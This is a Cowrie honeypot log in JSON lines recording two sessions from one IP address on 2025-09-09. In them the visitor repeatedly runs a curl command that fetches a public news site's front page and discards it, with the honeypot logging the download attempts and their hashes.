{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:20.883988Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:20.885403Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:20.906879Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:20.908086Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:31:20.913102Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:20.914385Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:20.915239Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:20.922300Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:20.926613Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:20.948723Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:20.950015Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:20.953679Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:20.954707Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:20.967732Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:20.996775Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:20.997707Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:21.000086Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:21.001117Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:21.010998Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:21.015729Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:21.039536Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:21.040805Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:21.043238Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:21.044161Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:21.086627Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:21.088123Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:21.090707Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:21.091831Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:21.137067Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:21.138304Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:21.147396Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:21.148315Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:21.151485Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:21.153360Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:21.154186Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:21.184576Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:21.185862Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:21.192482Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:21.193532Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:21.194710Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:21.196555Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:21.232250Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:21.233527Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:21.236167Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:21.237308Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:21.249908Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:21.250895Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:21.272928Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:21.274347Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:31:21.280514Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:21.310076Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:21.312584Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:21.335341Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:21.336608Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:21.344802Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:21.346109Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:21.350282Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:21.351226Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:21.379832Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:21.389884Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:21.391058Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:21.397216Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:21.400200Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:21.401189Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:21.420790Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:21.424968Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:21.426099Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:21.438913Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:21.440270Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:21.460351Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:21.462511Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:21.465584Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:21.466655Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:21.477500Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:21.478795Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:21.502860Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:21.505241Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:21.516316Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:21.517660Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:21.519073Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:21.520456Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:21.542837Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:21.543938Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:21.559778Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:21.561990Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:21.564200Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:21.565460Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:21.602187Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:21.635250Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:21.636628Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:21.641138Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:21.643886Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:21.656212Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:21.657508Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:21.682646Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:21.684093Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:21.685754Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:21.686910Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:21.692141Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:21.701105Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:21.702031Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:21.721420Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:21.722774Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:21.724942Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:21.725713Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:21.738178Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:21.739253Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:21.797234Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:21.798552Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:21.842653Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:21.843879Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:21.848875Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:21.850189Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:21.857231Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:21.858449Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:21.893169Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:21.894398Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:21.902349Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:21.904510Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
